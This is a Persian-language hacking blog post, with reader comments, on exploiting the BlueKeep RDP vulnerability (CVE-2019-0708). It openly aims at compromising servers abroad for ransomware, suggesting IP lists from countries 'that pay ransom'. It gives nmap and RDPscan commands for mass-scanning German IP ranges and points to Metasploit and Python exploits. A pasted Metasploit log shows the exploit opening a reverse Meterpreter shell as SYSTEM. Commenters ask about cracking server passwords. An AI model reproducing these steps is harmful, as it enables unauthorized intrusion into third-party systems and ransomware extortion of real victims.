آسیب پذیری BlueKeep

MR_C0D3R ‌

شاید خیلی چیزا راجب آسیب پذیری BlueKeep شنیده باشید و تو سایت های مختلف مطالب زیادی راجبش خونده باشین

اما توی این پست قراره به مو شکافی این آسیب پذیری بپردازیم و به کمک این آسیب پذیری سرور مجازی کشور های مختلف رو مورد عنایت قرار بدیم :)

آسیب پذیری BlueKeep چیست ؟

آسیب پذیری بلوکیپ برای سال 2019 هستش که با مشخصه CVE-2019-0708 توی دنیای تست نفوذ شناخته میشه که به کمک اون میتونیم به ویندوز های XP - Win.7 - Win.Server2003 - Win.Server2008 نفوذ کنیم

این آسیب پذیری روی پروتکل RDP با پورت 3389 وجود داره

نحوه ی پیدا کردن یه سیستم آسیب پذیر چطوره ؟

اگه قصد و نیت ما فقط شناسایی یک سیستم باشه خیلی راحت میتونیم به کمک Nmap اون آسیب پذیری رو به کمک دستور پایین شناسایی کنیم

nmap -sV --script=rdp-vuln-ms12-020 -p 3389 127.0.0.1

البته ابزار Nmap بدلیل جامع و پرکاربرد بودنش سوئیچ های دیگه ای هم داره که کارایی RDPscan رو برامون داشته باشه که قراره توی این پست باهاش کار کنیم

ولی خب همونطور که گفتم ما میخوایم کارمون به کمک ابزار RDPscan باشه که میتونید توی گیت هاب پیداش کنید ( اینجا )

اگرم حسش نیست برای دانلود کلیک کنید :)

ولی از شوخی گذشته پیشنهاد میکنم حتما خودتون چک کنید ، چون اطلاعات مفیدی راجب این برنامه بهتون خواهد داد

حالا نیاز به یه لیست آی پی داریم که داخلش آی پی های اسکن شده پورت 3389 وجود داشته باشه که برای اینکار میتونیم از ابزار KportScanner کمک بگیریم

ولی یه راه حل ساده تر وجود داره

توی قسمت سرچ تلگرامتون ، جستجو کنید : آی پی اسکن شده و یکی از فایلای متنی مربوط به یکی از کشورارو که میدونین باج میدن برای برگردوندن فایلاشون انتخاب و دانلود کنید ( باج افزار ) D:

بعدش فایلای داخل RDPscan رو استخراج کنید و فایلی که داخلش آی پی اسکن شده وجود داشت رو کنار برنامه قرار بدین

حالا وارد خط فرمان یا همون CMD بشید و خودتونو به فولدر RDPscan دایورت کنید D:

راستی حواستون باشه که آدرس پورت 3389 به انتهای آدرس آی پی نچسبیده باشه ، چون اونا توسط برنامه اسکن نمیشن

به هر حال من اینجا میخوام آی پی های کشور آلمان رو اسکن کنم و اسم فایلم Germany هستش

در نتیجه دستور پایین رو توی خط فرمانم وارد میکنم و حداقل پنج دقیقه ای صبر به خرج میدم

البته پنج دیقه هم زیاده و سیستمای آسیب پذیر زیادی گیر میاد ، ولی خب برای کار باج افزار خوبه که صبوریت به خرج بدیم دیگه D:

RDPscan --file Germany.txt --workers 10000 > Results.TxT

نتیجه ی دستور بالا اینه که یه فایل متنی با اسم Results ایجاد میشه و نتیجه اسکنمون توی اون ذخیره خواهد شد

طبق تصویر پایین

بعد از چند دیقه کافیه که خط فرمان رو ببندیم

و وارد فایل Results میشیم که با تصویر پایین یا یکسری چیزای مشابه این تصویر رو به رو خواهید شد ، چون نتیجه اسکن برای هر بار عوض میشه

توی تصویر همونطور که مشخصه من چند تا آدرس آی پی رو رووشوون خط زرد رنگ کشیدم که اونا آی پی های آسیب پذیر هستن و شما برای بدست آوردن راحت اونا کافیه که کلید های ترکیبی Ctrl+F رو فشار بدین و تو کادر جستجور Vul رو وارد و جستجو کنید و بعد از مورد عنایت قرار دادن هر آی پی کلید F3 رو فشار بدین تا اون یکی آسیب پذیر رو براتون گیر بیاره

حالا نوبت به مرحله ی آخر یعنی اکسپلویت کردن این آسیب پذیری میرسه که این مرحله رو یه خرده سانسور شده توضیح میدم تا براتون جا بیفته و بقیشو از مطالب سایتای دیگه استفاده کنید

اینکار به کمک سیستم عامل کالی لینوکس و متاسپلویت صورت میگیره که اگرم بخوایم تو سیستم عامل های لینوکسی دیگه مثل اوبونتو انجام بدیم فقط کافیه که متاسپلویت رو روی اونا نصب کنیم ، یا از اسکریپت های پایتونی که توی گیت هاب برای اینکار وجود داره استفاده کنیم

اول از همه باید سیستم عامل رو بروزرسانی کنیم که برای اینکار از این دستور استفاده میکنیم

apt-get update && apt-get upgrade

در نهایت به کمک دستور reboot یکبار سیستم رو ReStart کنید و مجددا وارد حساب کاربری لینوکستون بشید

حالا وارد ترمینال بشید و با دستور msfconsole متاسپلویت رو استارت کنید و بقیشو هم به کمک آموزش هایی که داخل اینترنت منتشر شدن پیش برید

اگه هم موفق نشدید سعی کنید از اسکریپت های پایتونی استفاده کنید که مثلا نمونش اینجا قرار داره

موفق و پیروز باشید

۶ ♥

۱۶۸۶ نمایش

هک با پایتون

هک سیستم با پایتون

هک و امنیت

هک ویندوز

هک ویندوز XP

هک ویندوز هفت و هشت

هک پسورد ویندوز

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150 GROOMSIZE => 150 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Started reverse TCP handler on 192.168.43.84:4444 [*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.43.137:3389 - The target is vulnerable. [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1. [*] 192.168.43.137:3389 - Surfing channels ... [*] 192.168.43.137:3389 - Lobbing eggs ... [-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50 GROOMSIZE => 50 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Started reverse TCP handler on 192.168.43.84:4444 [*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.43.137:3389 - The target is vulnerable. [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1. [*] 192.168.43.137:3389 - Surfing channels ... [*] 192.168.43.137:3389 - Lobbing eggs ... [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ... [*] Sending stage (206403 bytes) to 192.168.43.137 [*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

۲۵ تیر ۹۹ ، ۱۰:۳۱

احمد

سلام

ببخشید وقتی که ما تمامی این مراحل رو طی کردیم چه اتفاقی برای اون آی پی میوفته؟

باتشکر

۲۵ تیر ۹۹ ، ۱۴:۱۲

ATTRIB 32

عه مستر کدر برگشت D:

سلطان عالی بود، تو سایتا همش چرت و پرت نوشته بودن ماهم که انگلیسی....D:

دمت گرم، به افتخار داش کدر یه دست قشنگ...

۲۶ تیر ۹۹ ، ۱۲:۳۱

DęЯǞqΦЦlǞ ..

بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

سلام چطوری *** بیا تل کارت دارم

۲۶ تیر ۹۹ ، ۱۶:۵۱

علی

سلام اقا یه سوال پسورد سرور رو هم میشه پیدا کرد ؟

ممنون میشم بگید اخه من تو کار کرک سرورم میخام این روشم امتحان کنم

ممنون

۲۳ مرداد ۹۹ ، ۰۸:۲۰

سلام بقیه شو بیاد چی کار کنیم مد نمیدونم موندم توش خواهشا یک چیز میزارین یکم راهنمایی کنید این دیگه فوق سانسور بود الان نفهمیدم باید set lhost= رو برابر با اون ای پی قربانی تنظیم کنیم پس پورت چند و بعد دستور run exploit کدوم ولی دمتون گرم که اینقدر مطلبو پیچوندید که ادم هایی که حرفه ایی هستن در این زمینه فقط متوجه میشن

۱۶ شهریور ۹۹ ، ۱۶:۱۹

MR.NIMOS

سلام کدر

چطوری؟
[!] error on target: ip (ord() expected string of length 1, but int found), if this happened after a successful attack, change the wait time

این ارور ماله همون اکسپلویتیه که گذاشتی
داخل کدشو چک کردم اصن تایع ord به کار نبرده بود فقط دو جا استفاده کرده بود که اونم ورودیشو خودش میده

۱۷ شهریور ۹۹ ، ۲۱:۳۵

Mr_NIMOS

سلام
اکسپلویت پایتون رو ولش کن مهم نیست ببین من با متا اسپلویت زدم میگه اکسپلویت کامل شد ولی سشنی ایجاد نشد :/

با rdpscan و خود متا اسپلویت ایپی رو چک کردم جفتشون میگن اسیب پذیره ولی خب جواب نداد :/

این یکی فازش چیه؟ :/

۲۳ شهریور ۹۹ ، ۲۰:۰۰

من باز اومدم
یه نفره این پستتو داغ کردم D:

ببین اون مشکل قبلی حل شد

الان مشکلم یه چی دیگس

به قول خودش میره تو فاز خطر :|

بعد میگه Lobbing eggs ....

بعد همونطوری میمونه :/

منتظر هم میمونم ولی هیچی نمیشه

V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢